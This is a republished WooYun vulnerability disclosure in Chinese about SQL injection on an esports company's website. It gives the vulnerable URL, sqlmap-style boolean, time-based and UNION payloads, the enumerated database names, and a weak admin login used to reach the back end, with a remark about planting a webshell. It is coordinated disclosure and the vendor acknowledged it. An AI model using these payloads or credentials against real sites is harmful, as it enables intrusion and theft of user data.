电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

2017年4月9日06:09:06评论262 views字数 244阅读0分48秒阅读模式

摘要

2016-03-29：细节已通知厂商并且等待厂商处理中
2016-03-29：厂商已经确认，细节仅向厂商公开
2016-04-08：细节向核心白帽子及相关领域专家公开
2016-04-18：细节向普通白帽子公开
2016-04-28：细节向实习白帽子公开
2016-05-13：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-190111

漏洞标题：电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

漏洞作者： mango

提交时间： 2016-03-29 14:32

公开时间： 2016-05-13 14:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：第三方不可信程序 php+数字类型注射管理后台对外

0人收藏

漏洞详情

披露状态：

简要描述：

上海锐问信息技术有限公司作为电子竞技娱乐业的一颗新星，由电竞行业领军人物和行业资深人士共同创办。公司业务涵盖游戏节目内容制作、电竞明星经纪服务等等。

旗下签约众多行业知名明星，包括业内超人气明星小苍、小米、JY、苦笑、小訫等人。制作的内容和节目均为业内标杆，包括《神探苍英雄百科》、《神探苍实战秘籍》等栏目都拥有着百万级别的点击播放量，深受着广大电竞玩家的喜爱。

公司携手行业知名明星，立志为行业明星和主播提供最优质和专业的经纪服务，并为行业培养更多的优质明星和主播。同时，我们致力于在泛娱乐圈横跨多平台，打通游戏、电竞、影视娱乐行业，与明星、战队和业内上下游公司展开深入合作，推动和促进电竞行业的升级和进一步发展。

详细说明：

先从他们公司主站进行说起

http://www.t-rex.cn/artInfo.php?id=131 主站全部都是注入,只要是有参数的都有问题（请仔细清查）

code 区域

---
 Parameter: id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=131 AND 8715=8715
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: id=131 AND (SELECT * FROM (SELECT(SLEEP(5)))swZE)
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 26 columns
     Payload: id=131 UNION ALL SELECT CONCAT(0x7178787171,0x4b624a7774537658444a6d684a48436a5457464f524151566642627469496f7356517576464b644a,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 ---
 web server operating system: Linux Ubuntu
 web application technology: Nginx
 back-end DBMS: MySQL 5.0.12
 available databases [6]:
 [*] esf_master
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] test
 [*] trex_cn

注入出的信息

trex_cn官网的数据试过了

system 密码admin

恩~有收获了找到用户名了然后尝试弱口令

test 123123 成功进入后台

然后修改一下发现的确有权限的~

这不就可以远程挂马了么~

修复方案：

仔细检查线上代码安全,过滤危险字符,禁止任何弱口令。

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-29 14:37

厂商回复：

感谢白帽提醒，漏洞已确认，正在进行修复。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-26 10:07 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

0

一言不合就getshell

1# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-190111

漏洞标题： 电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

相关厂商： t-rex.cn

漏洞作者： mango

提交时间： 2016-03-29 14:32

公开时间： 2016-05-13 14:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 第三方不可信程序 php+数字类型注射 管理后台对外

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

危害等级：高

漏洞状态：厂商已经确认

Tags标签：第三方不可信程序 php+数字类型注射管理后台对外

漏洞评价(共0人评价):

登陆后才能进行评分